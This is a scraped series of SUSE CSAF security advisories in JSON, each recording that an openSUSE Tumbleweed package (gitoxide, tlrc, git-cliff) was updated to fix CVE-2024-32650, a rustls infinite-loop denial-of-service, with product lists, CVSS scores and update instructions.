{ "document": { "aggregate_severity": { "namespace": "https://www.suse.com/support/security/rating/", "text": "moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright 2024 SUSE LLC. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "gitoxide-0.38.0-1.1 on GA media", "title": "Title of the patch" }, { "category": "description", "text": "These are all security issues fixed in the gitoxide-0.38.0-1.1 package on the GA media of openSUSE Tumbleweed.", "title": "Description of the patch" }, { "category": "details", "text": "openSUSE-Tumbleweed-2024-14424", "title": "Patchnames" }, { "category": "legal_disclaimer", "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", "title": "Terms of use" } ], "publisher": { "category": "vendor", "contact_details": "https://www.suse.com/support/security/contact/", "name": "SUSE Product Security Team", "namespace": "https://www.suse.com/" }, "references": [ { "category": "external", "summary": "SUSE ratings", "url": "https://www.suse.com/support/security/rating/" }, { "category": "self", "summary": "URL of this CSAF notice", "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_14424-1.json" }, { "category": "self", "summary": "SUSE CVE CVE-2024-32650 page", "url": "https://www.suse.com/security/cve/CVE-2024-32650/" } ], "title": "gitoxide-0.38.0-1.1 on GA media", "tracking": { "current_release_date": "2024-10-23T00:00:00Z", "generator": { "date": "2024-10-23T00:00:00Z", "engine": { "name": "cve-database.git:bin/generate-csaf.pl", "version": "1" } }, "id": "openSUSE-SU-2024:14424-1", "initial_release_date": "2024-10-23T00:00:00Z", "revision_history": [ { "date": "2024-10-23T00:00:00Z", "number": "1", "summary": "Current version" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version", "name": "gitoxide-0.38.0-1.1.aarch64", "product": { "name": "gitoxide-0.38.0-1.1.aarch64", "product_id": "gitoxide-0.38.0-1.1.aarch64" } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "gitoxide-0.38.0-1.1.ppc64le", "product": { "name": "gitoxide-0.38.0-1.1.ppc64le", "product_id": "gitoxide-0.38.0-1.1.ppc64le" } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "gitoxide-0.38.0-1.1.s390x", "product": { "name": "gitoxide-0.38.0-1.1.s390x", "product_id": "gitoxide-0.38.0-1.1.s390x" } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "gitoxide-0.38.0-1.1.x86_64", "product": { "name": "gitoxide-0.38.0-1.1.x86_64", "product_id": "gitoxide-0.38.0-1.1.x86_64" } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_name", "name": "openSUSE Tumbleweed", "product": { "name": "openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed", "product_identification_helper": { "cpe": "cpe:/o:opensuse:tumbleweed" } } } ], "category": "product_family", "name": "SUSE Linux Enterprise" } ], "category": "vendor", "name": "SUSE" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "gitoxide-0.38.0-1.1.aarch64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:gitoxide-0.38.0-1.1.aarch64" }, "product_reference": "gitoxide-0.38.0-1.1.aarch64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "gitoxide-0.38.0-1.1.ppc64le as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:gitoxide-0.38.0-1.1.ppc64le" }, "product_reference": "gitoxide-0.38.0-1.1.ppc64le", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "gitoxide-0.38.0-1.1.s390x as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:gitoxide-0.38.0-1.1.s390x" }, "product_reference": "gitoxide-0.38.0-1.1.s390x", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "gitoxide-0.38.0-1.1.x86_64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:gitoxide-0.38.0-1.1.x86_64" }, "product_reference": "gitoxide-0.38.0-1.1.x86_64", "relates_to_product_reference": "openSUSE Tumbleweed" } ] }, "vulnerabilities": [ { "cve": "CVE-2024-32650", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-32650" } ], "notes": [ { "category": "general", "text": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11.", "title": "CVE description" } ], "product_status": { "recommended": [ "openSUSE Tumbleweed:gitoxide-0.38.0-1.1.aarch64", "openSUSE Tumbleweed:gitoxide-0.38.0-1.1.ppc64le", "openSUSE Tumbleweed:gitoxide-0.38.0-1.1.s390x", "openSUSE Tumbleweed:gitoxide-0.38.0-1.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-32650", "url": "https://www.suse.com/security/cve/CVE-2024-32650" }, { "category": "external", "summary": "SUSE Bug 1223211 for CVE-2024-32650", "url": "https://bugzilla.suse.com/1223211" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "openSUSE Tumbleweed:gitoxide-0.38.0-1.1.aarch64", "openSUSE Tumbleweed:gitoxide-0.38.0-1.1.ppc64le", "openSUSE Tumbleweed:gitoxide-0.38.0-1.1.s390x", "openSUSE Tumbleweed:gitoxide-0.38.0-1.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "openSUSE Tumbleweed:gitoxide-0.38.0-1.1.aarch64", "openSUSE Tumbleweed:gitoxide-0.38.0-1.1.ppc64le", "openSUSE Tumbleweed:gitoxide-0.38.0-1.1.s390x", "openSUSE Tumbleweed:gitoxide-0.38.0-1.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2024-10-23T00:00:00Z", "details": "important" } ], "title": "CVE-2024-32650" } ] }
opensuse-su-2024:13917-1
Vulnerability from csaf_opensuse
Notes
{ "document": { "aggregate_severity": { "namespace": "https://www.suse.com/support/security/rating/", "text": "moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright 2024 SUSE LLC. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "tlrc-1.9.2+0-1.1 on GA media", "title": "Title of the patch" }, { "category": "description", "text": "These are all security issues fixed in the tlrc-1.9.2+0-1.1 package on the GA media of openSUSE Tumbleweed.", "title": "Description of the patch" }, { "category": "details", "text": "openSUSE-Tumbleweed-2024-13917", "title": "Patchnames" }, { "category": "legal_disclaimer", "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", "title": "Terms of use" } ], "publisher": { "category": "vendor", "contact_details": "https://www.suse.com/support/security/contact/", "name": "SUSE Product Security Team", "namespace": "https://www.suse.com/" }, "references": [ { "category": "external", "summary": "SUSE ratings", "url": "https://www.suse.com/support/security/rating/" }, { "category": "self", "summary": "URL of this CSAF notice", "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_13917-1.json" }, { "category": "self", "summary": "SUSE CVE CVE-2024-32650 page", "url": "https://www.suse.com/security/cve/CVE-2024-32650/" } ], "title": "tlrc-1.9.2+0-1.1 on GA media", "tracking": { "current_release_date": "2024-06-15T00:00:00Z", "generator": { "date": "2024-06-15T00:00:00Z", "engine": { "name": "cve-database.git:bin/generate-csaf.pl", "version": "1" } }, "id": "openSUSE-SU-2024:13917-1", "initial_release_date": "2024-06-15T00:00:00Z", "revision_history": [ { "date": "2024-06-15T00:00:00Z", "number": "1", "summary": "Current version" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version", "name": "tlrc-1.9.2+0-1.1.aarch64", "product": { "name": "tlrc-1.9.2+0-1.1.aarch64", "product_id": "tlrc-1.9.2+0-1.1.aarch64" } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "tlrc-1.9.2+0-1.1.ppc64le", "product": { "name": "tlrc-1.9.2+0-1.1.ppc64le", "product_id": "tlrc-1.9.2+0-1.1.ppc64le" } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "tlrc-1.9.2+0-1.1.s390x", "product": { "name": "tlrc-1.9.2+0-1.1.s390x", "product_id": "tlrc-1.9.2+0-1.1.s390x" } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "tlrc-1.9.2+0-1.1.x86_64", "product": { "name": "tlrc-1.9.2+0-1.1.x86_64", "product_id": "tlrc-1.9.2+0-1.1.x86_64" } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_name", "name": "openSUSE Tumbleweed", "product": { "name": "openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed", "product_identification_helper": { "cpe": "cpe:/o:opensuse:tumbleweed" } } } ], "category": "product_family", "name": "SUSE Linux Enterprise" } ], "category": "vendor", "name": "SUSE" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "tlrc-1.9.2+0-1.1.aarch64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:tlrc-1.9.2+0-1.1.aarch64" }, "product_reference": "tlrc-1.9.2+0-1.1.aarch64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "tlrc-1.9.2+0-1.1.ppc64le as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:tlrc-1.9.2+0-1.1.ppc64le" }, "product_reference": "tlrc-1.9.2+0-1.1.ppc64le", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "tlrc-1.9.2+0-1.1.s390x as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:tlrc-1.9.2+0-1.1.s390x" }, "product_reference": "tlrc-1.9.2+0-1.1.s390x", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "tlrc-1.9.2+0-1.1.x86_64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:tlrc-1.9.2+0-1.1.x86_64" }, "product_reference": "tlrc-1.9.2+0-1.1.x86_64", "relates_to_product_reference": "openSUSE Tumbleweed" } ] }, "vulnerabilities": [ { "cve": "CVE-2024-32650", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-32650" } ], "notes": [ { "category": "general", "text": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11.", "title": "CVE description" } ], "product_status": { "recommended": [ "openSUSE Tumbleweed:tlrc-1.9.2+0-1.1.aarch64", "openSUSE Tumbleweed:tlrc-1.9.2+0-1.1.ppc64le", "openSUSE Tumbleweed:tlrc-1.9.2+0-1.1.s390x", "openSUSE Tumbleweed:tlrc-1.9.2+0-1.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-32650", "url": "https://www.suse.com/security/cve/CVE-2024-32650" }, { "category": "external", "summary": "SUSE Bug 1223211 for CVE-2024-32650", "url": "https://bugzilla.suse.com/1223211" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "openSUSE Tumbleweed:tlrc-1.9.2+0-1.1.aarch64", "openSUSE Tumbleweed:tlrc-1.9.2+0-1.1.ppc64le", "openSUSE Tumbleweed:tlrc-1.9.2+0-1.1.s390x", "openSUSE Tumbleweed:tlrc-1.9.2+0-1.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "openSUSE Tumbleweed:tlrc-1.9.2+0-1.1.aarch64", "openSUSE Tumbleweed:tlrc-1.9.2+0-1.1.ppc64le", "openSUSE Tumbleweed:tlrc-1.9.2+0-1.1.s390x", "openSUSE Tumbleweed:tlrc-1.9.2+0-1.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2024-06-15T00:00:00Z", "details": "important" } ], "title": "CVE-2024-32650" } ] }
opensuse-su-2024:13969-1
Vulnerability from csaf_opensuse
Notes
{ "document": { "aggregate_severity": { "namespace": "https://www.suse.com/support/security/rating/", "text": "moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright 2024 SUSE LLC. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "git-cliff-2.2.2-1.1 on GA media", "title": "Title of the patch" }, { "category": "description", "text": "These are all security issues fixed in the git-cliff-2.2.2-1.1 package on the GA media of openSUSE Tumbleweed.", "title": "Description of the patch" }, { "category": "details", "text": "openSUSE-Tumbleweed-2024-13969", "title": "Patchnames" }, { "category": "legal_disclaimer", "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", "title": "Terms of use" } ], "publisher": { "category": "vendor", "contact_details": "https://www.suse.com/support/security/contact/", "name": "SUSE Product Security Team", "namespace": "https://www.suse.com/" }, "references": [ { "category": "external", "summary": "SUSE ratings", "url": "https://www.suse.com/support/security/rating/" }, { "category": "self", "summary": "URL of this CSAF notice", "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_13969-1.json" }, { "category": "self", "summary": "SUSE CVE CVE-2024-32650 page", "url": "https://www.suse.com/security/cve/CVE-2024-32650/" } ], "title": "git-cliff-2.2.2-1.1 on GA media", "tracking": { "current_release_date": "2024-06-15T00:00:00Z", "generator": { "date": "2024-06-15T00:00:00Z", "engine": { "name": "cve-database.git:bin/generate-csaf.pl", "version": "1" } }, "id": "openSUSE-SU-2024:13969-1", "initial_release_date": "2024-06-15T00:00:00Z", "revision_history": [ { "date": "2024-06-15T00:00:00Z", "number": "1", "summary": "Current version" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version", "name": "git-cliff-2.2.2-1.1.aarch64", "product": { "name": "git-cliff-2.2.2-1.1.aarch64", "product_id": "git-cliff-2.2.2-1.1.aarch64" } }, { "category": "product_version", "name": "git-cliff-bash-completion-2.2.2-1.1.aarch64", "product": { "name": "git-cliff-bash-completion-2.2.2-1.1.aarch64", "product_id": "git-cliff-bash-completion-2.2.2-1.1.aarch64" } }, { "category": "product_version", "name": "git-cliff-fish-completion-2.2.2-1.1.aarch64", "product": { "name": "git-cliff-fish-completion-2.2.2-1.1.aarch64", "product_id": "git-cliff-fish-completion-2.2.2-1.1.aarch64" } }, { "category": "product_version", "name": "git-cliff-zsh-completion-2.2.2-1.1.aarch64", "product": { "name": "git-cliff-zsh-completion-2.2.2-1.1.aarch64", "product_id": "git-cliff-zsh-completion-2.2.2-1.1.aarch64" } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "git-cliff-2.2.2-1.1.ppc64le", "product": { "name": "git-cliff-2.2.2-1.1.ppc64le", "product_id": "git-cliff-2.2.2-1.1.ppc64le" } }, { "category": "product_version", "name": "git-cliff-bash-completion-2.2.2-1.1.ppc64le", "product": { "name": "git-cliff-bash-completion-2.2.2-1.1.ppc64le", "product_id": "git-cliff-bash-completion-2.2.2-1.1.ppc64le" } }, { "category": "product_version", "name": "git-cliff-fish-completion-2.2.2-1.1.ppc64le", "product": { "name": "git-cliff-fish-completion-2.2.2-1.1.ppc64le", "product_id": "git-cliff-fish-completion-2.2.2-1.1.ppc64le" } }, { "category": "product_version", "name": "git-cliff-zsh-completion-2.2.2-1.1.ppc64le", "product": { "name": "git-cliff-zsh-completion-2.2.2-1.1.ppc64le", "product_id": "git-cliff-zsh-completion-2.2.2-1.1.ppc64le" } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "git-cliff-2.2.2-1.1.s390x", "product": { "name": "git-cliff-2.2.2-1.1.s390x", "product_id": "git-cliff-2.2.2-1.1.s390x" } }, { "category": "product_version", "name": "git-cliff-bash-completion-2.2.2-1.1.s390x", "product": { "name": "git-cliff-bash-completion-2.2.2-1.1.s390x", "product_id": "git-cliff-bash-completion-2.2.2-1.1.s390x" } }, { "category": "product_version", "name": "git-cliff-fish-completion-2.2.2-1.1.s390x", "product": { "name": "git-cliff-fish-completion-2.2.2-1.1.s390x", "product_id": "git-cliff-fish-completion-2.2.2-1.1.s390x" } }, { "category": "product_version", "name": "git-cliff-zsh-completion-2.2.2-1.1.s390x", "product": { "name": "git-cliff-zsh-completion-2.2.2-1.1.s390x", "product_id": "git-cliff-zsh-completion-2.2.2-1.1.s390x" } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "git-cliff-2.2.2-1.1.x86_64", "product": { "name": "git-cliff-2.2.2-1.1.x86_64", "product_id": "git-cliff-2.2.2-1.1.x86_64" } }, { "category": "product_version", "name": "git-cliff-bash-completion-2.2.2-1.1.x86_64", "product": { "name": "git-cliff-bash-completion-2.2.2-1.1.x86_64", "product_id": "git-cliff-bash-completion-2.2.2-1.1.x86_64" } }, { "category": "product_version", "name": "git-cliff-fish-completion-2.2.2-1.1.x86_64", "product": { "name": "git-cliff-fish-completion-2.2.2-1.1.x86_64", "product_id": "git-cliff-fish-completion-2.2.2-1.1.x86_64" } }, { "category": "product_version", "name": "git-cliff-zsh-completion-2.2.2-1.1.x86_64", "product": { "name": "git-cliff-zsh-completion-2.2.2-1.1.x86_64", "product_id": "git-cliff-zsh-completion-2.2.2-1.1.x86_64" } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_name", "name": "openSUSE Tumbleweed", "product": { "name": "openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed", "product_identification_helper": { "cpe": "cpe:/o:opensuse:tumbleweed" } } } ], "category": "product_family", "name": "SUSE Linux Enterprise" } ], "category": "vendor", "name": "SUSE" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "git-cliff-2.2.2-1.1.aarch64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:git-cliff-2.2.2-1.1.aarch64" }, "product_reference": "git-cliff-2.2.2-1.1.aarch64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-2.2.2-1.1.ppc64le as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:git-cliff-2.2.2-1.1.ppc64le" }, "product_reference": "git-cliff-2.2.2-1.1.ppc64le", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-2.2.2-1.1.s390x as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:git-cliff-2.2.2-1.1.s390x" }, "product_reference": "git-cliff-2.2.2-1.1.s390x", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-2.2.2-1.1.x86_64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:git-cliff-2.2.2-1.1.x86_64" }, "product_reference": "git-cliff-2.2.2-1.1.x86_64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-bash-completion-2.2.2-1.1.aarch64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:git-cliff-bash-completion-2.2.2-1.1.aarch64" }, "product_reference": "git-cliff-bash-completion-2.2.2-1.1.aarch64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-bash-completion-2.2.2-1.1.ppc64le as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:git-cliff-bash-completion-2.2.2-1.1.ppc64le" }, "product_reference": "git-cliff-bash-completion-2.2.2-1.1.ppc64le", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-bash-completion-2.2.2-1.1.s390x as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:git-cliff-bash-completion-2.2.2-1.1.s390x" }, "product_reference": "git-cliff-bash-completion-2.2.2-1.1.s390x", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-bash-completion-2.2.2-1.1.x86_64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:git-cliff-bash-completion-2.2.2-1.1.x86_64" }, "product_reference": "git-cliff-bash-completion-2.2.2-1.1.x86_64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-fish-completion-2.2.2-1.1.aarch64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:git-cliff-fish-completion-2.2.2-1.1.aarch64" }, "product_reference": "git-cliff-fish-completion-2.2.2-1.1.aarch64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-fish-completion-2.2.2-1.1.ppc64le as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:git-cliff-fish-completion-2.2.2-1.1.ppc64le" }, "product_reference": "git-cliff-fish-completion-2.2.2-1.1.ppc64le", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-fish-completion-2.2.2-1.1.s390x as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:git-cliff-fish-completion-2.2.2-1.1.s390x" }, "product_reference": "git-cliff-fish-completion-2.2.2-1.1.s390x", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-fish-completion-2.2.2-1.1.x86_64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:git-cliff-fish-completion-2.2.2-1.1.x86_64" }, "product_reference": "git-cliff-fish-completion-2.2.2-1.1.x86_64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-zsh-completion-2.2.2-1.1.aarch64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:git-cliff-zsh-completion-2.2.2-1.1.aarch64" }, "product_reference": "git-cliff-zsh-completion-2.2.2-1.1.aarch64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-zsh-completion-2.2.2-1.1.ppc64le as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:git-cliff-zsh-completion-2.2.2-1.1.ppc64le" }, "product_reference": "git-cliff-zsh-completion-2.2.2-1.1.ppc64le", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-zsh-completion-2.2.2-1.1.s390x as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:git-cliff-zsh-completion-2.2.2-1.1.s390x" }, "product_reference": "git-cliff-zsh-completion-2.2.2-1.1.s390x", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-zsh-completion-2.2.2-1.1.x86_64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:git-cliff-zsh-completion-2.2.2-1.1.x86_64" }, "product_reference": "git-cliff-zsh-completion-2.2.2-1.1.x86_64", "relates_to_product_reference": "openSUSE Tumbleweed" } ] }, "vulnerabilities": [ { "cve": "CVE-2024-32650", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-32650" } ], "notes": [ { "category": "general", "text": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11.", "title": "CVE description" } ], "product_status": { "recommended": [ "openSUSE Tumbleweed:git-cliff-2.2.2-1.1.aarch64", "openSUSE Tumbleweed:git-cliff-2.2.2-1.1.ppc64le", "openSUSE Tumbleweed:git-cliff-2.2.2-1.1.s390x", "openSUSE Tumbleweed:git-cliff-2.2.2-1.1.x86_64", "openSUSE Tumbleweed:git-cliff-bash-completion-2.2.2-1.1.aarch64", "openSUSE Tumbleweed:git-cliff-bash-completion-2.2.2-1.1.ppc64le", "openSUSE Tumbleweed:git-cliff-bash-completion-2.2.2-1.1.s390x", "openSUSE Tumbleweed:git-cliff-bash-completion-2.2.2-1.1.x86_64", "openSUSE Tumbleweed:git-cliff-fish-completion-2.2.2-1.1.aarch64", "openSUSE Tumbleweed:git-cliff-fish-completion-2.2.2-1.1.ppc64le", "openSUSE Tumbleweed:git-cliff-fish-completion-2.2.2-1.1.s390x", "openSUSE Tumbleweed:git-cliff-fish-completion-2.2.2-1.1.x86_64", "openSUSE Tumbleweed:git-cliff-zsh-completion-2.2.2-1.1.aarch64", "openSUSE Tumbleweed:git-cliff-zsh-completion-2.2.2-1.1.ppc64le", "openSUSE Tumbleweed:git-cliff-zsh-completion-2.2.2-1.1.s390x", "openSUSE Tumbleweed:git-cliff-zsh-completion-2.2.2-1.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-32650", "url": "https://www.suse.com/security/cve/CVE-2024-32650" }, { "category": "external", "summary": "SUSE Bug 1223211 for CVE-2024-32650", "url": "https://bugzilla.suse.com/1223211" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "openSUSE Tumbleweed:git-cliff-2.2.2-1.1.aarch64", "openSUSE Tumbleweed:git-cliff-2.2.2-1.1.ppc64le", "openSUSE Tumbleweed:git-cliff-2.2.2-1.1.s390x", "openSUSE Tumbleweed:git-cliff-2.2.2-1.1.x86_64", "openSUSE Tumbleweed:git-cliff-bash-completion-2.2.2-1.1.aarch64", "openSUSE Tumbleweed:git-cliff-bash-completion-2.2.2-1.1.ppc64le", "openSUSE Tumbleweed:git-cliff-bash-completion-2.2.2-1.1.s390x", "openSUSE Tumbleweed:git-cliff-bash-completion-2.2.2-1.1.x86_64", "openSUSE Tumbleweed:git-cliff-fish-completion-2.2.2-1.1.aarch64", "openSUSE Tumbleweed:git-cliff-fish-completion-2.2.2-1.1.ppc64le", "openSUSE Tumbleweed:git-cliff-fish-completion-2.2.2-1.1.s390x", "openSUSE Tumbleweed:git-cliff-fish-completion-2.2.2-1.1.x86_64", "openSUSE Tumbleweed:git-cliff-zsh-completion-2.2.2-1.1.aarch64", "openSUSE Tumbleweed:git-cliff-zsh-completion-2.2.2-1.1.ppc64le", "openSUSE Tumbleweed:git-cliff-zsh-completion-2.2.2-1.1.s390x", "openSUSE Tumbleweed:git-cliff-zsh-completion-2.2.2-1.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "openSUSE Tumbleweed:git-cliff-2.2.2-1.1.aarch64", "openSUSE Tumbleweed:git-cliff-2.2.2-1.1.ppc64le", "openSUSE Tumbleweed:git-cliff-2.2.2-1.1.s390x", "openSUSE Tumbleweed:git-cliff-2.2.2-1.1.x86_64", "openSUSE Tumbleweed:git-cliff-bash-completion-2.2.2-1.1.aarch64", "openSUSE Tumbleweed:git-cliff-bash-completion-2.2.2-1.1.ppc64le", "openSUSE Tumbleweed:git-cliff-bash-completion-2.2.2-1.1.s390x", "openSUSE Tumbleweed:git-cliff-bash-completion-2.2.2-1.1.x86_64", "openSUSE Tumbleweed:git-cliff-fish-completion-2.2.2-1.1.aarch64", "openSUSE Tumbleweed:git-cliff-fish-completion-2.2.2-1.1.ppc64le", "openSUSE Tumbleweed:git-cliff-fish-completion-2.2.2-1.1.s390x", "openSUSE Tumbleweed:git-cliff-fish-completion-2.2.2-1.1.x86_64", "openSUSE Tumbleweed:git-cliff-zsh-completion-2.2.2-1.1.aarch64", "openSUSE Tumbleweed:git-cliff-zsh-completion-2.2.2-1.1.ppc64le", "openSUSE Tumbleweed:git-cliff-zsh-completion-2.2.2-1.1.s390x", "openSUSE Tumbleweed:git-cliff-zsh-completion-2.2.2-1.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2024-06-15T00:00:00Z", "details": "important" } ], "title": "CVE-2024-32650" } ] }
opensuse-su-2024:13912-1
Vulnerability from csaf_opensuse
Notes
